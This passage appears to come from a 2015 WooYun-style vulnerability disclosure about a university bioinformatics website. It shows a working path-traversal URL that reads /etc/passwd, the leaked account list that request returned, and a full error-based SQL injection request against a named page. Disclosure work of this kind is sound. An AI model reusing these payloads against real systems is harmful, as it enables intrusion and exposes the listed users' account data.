name="list" /><input type="hidden" name="mir" /></form><form id="form2"42 name="form242" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"42 name="formo42" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim42" type="hidden" id="sim42" value="tengzhixia:x:2016:1001:Zhixia Teng:/home/tengzhixia:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim42); document.form142.list.value="tengzhixia:x:2016:1001:Zhixia Teng:/home/tengzhixia:/bin/bash";document.form242.list.value="";document.formo42.list.value="";document.form142.mir.value="";document.form242.mir.value="";document.formo42.mir.value="\t";</script><script type="text/javascript">document.getElementById("hitnum").innerHTML="<span class=\"STYLE4\"><span class=\"STYLE7\">42</span> hit(s)</span> ";</script><script type="text/javascript">document.getElementById("info2").style.display="none";setInterval("document.getElementById(\"info2\").style.display=\"none\";", 3000);</script><!---->
2、文件读取
http://nclab.hit.edu.cn/SoymiRNet/netview/gene_getnet.php?asp=bp&len=0&nbr=0&net=../../../../../../../../../../etc/passwd&node=0&rmvlp=noight-click the nodes for more options! Not shown? Reload!Pairwise matches0 node(s) 0 first 0th neighbor(s), 42 edge(s) No. Gene 1 Gene 2 GeneFun UniprotKB ID 1 UniprotKB ID 2 #miRNA 1 #miRNA 2 #Overlapped Ontology1 root:x:0:0:root:/root:/bin/bash2 daemon:x:1:1:daemon:/usr/sbin:/bin/sh3 bin:x:2:2:bin:/bin:/bin/sh4 sys:x:3:3:sys:/dev:/bin/sh5 sync:x:4:65534:sync:/bin:/bin/sync6 games:x:5:60:games:/usr/games:/bin/sh7 man:x:6:12:man:/var/cache/man:/bin/sh8 lp:x:7:7:lp:/var/spool/lpd:/bin/sh9 mail:x:8:8:mail:/var/mail:/bin/sh10 news:x:9:9:news:/var/spool/news:/bin/sh11 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh12 proxy:x:13:13:proxy:/bin:/bin/sh13 www-data:x:33:33:www-data:/var/www:/bin/sh14 backup:x:34:34:backup:/var/backups:/bin/sh15 list:x:38:38:Mailing List Manager:/var/list:/bin/sh16 irc:x:39:39:ircd:/var/run/ircd:/bin/sh17 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh18 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh19 libuuid:x:100:101::/var/lib/libuuid:/bin/sh20 Debian-exim:x:101:103::/var/spool/exim4:/bin/false21 statd:x:102:65534::/var/lib/nfs:/bin/false22 chunyu:x:1000:1000:Chunyu Wang,,,:/home/chunyu:/bin/bash23 sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin24 nclab:x:1001:1001:,,,:/home/nclab:/bin/bash25 messagebus:x:104:106::/var/run/dbus:/bin/false26 avahi:x:105:107:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false27 mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false28 openldap:x:107:111:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false29 guoer:x:1003:1003::/home/guoer:/bin/bash
3、sql注入
POST /hmdpred/web1.php HTTP/1.1Content-Length: 362Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=anklt8qta6kjl0hcrhj8kbus32; JHost: nclab.hit.edu.cnsubmitButtom=select&diseases='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(101)%2cCHAR(86)%2cCHAR(111)%2cCHAR(102)%2cCHAR(55)%2cCHAR(120)%2cCHAR(105)%2cCHAR(77))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&miRNAs=0
不继续深入
危害等级:无影响厂商忽略
忽略时间:2015-11-28 11:40
漏洞Rank:4 (WooYun评价)
暂无
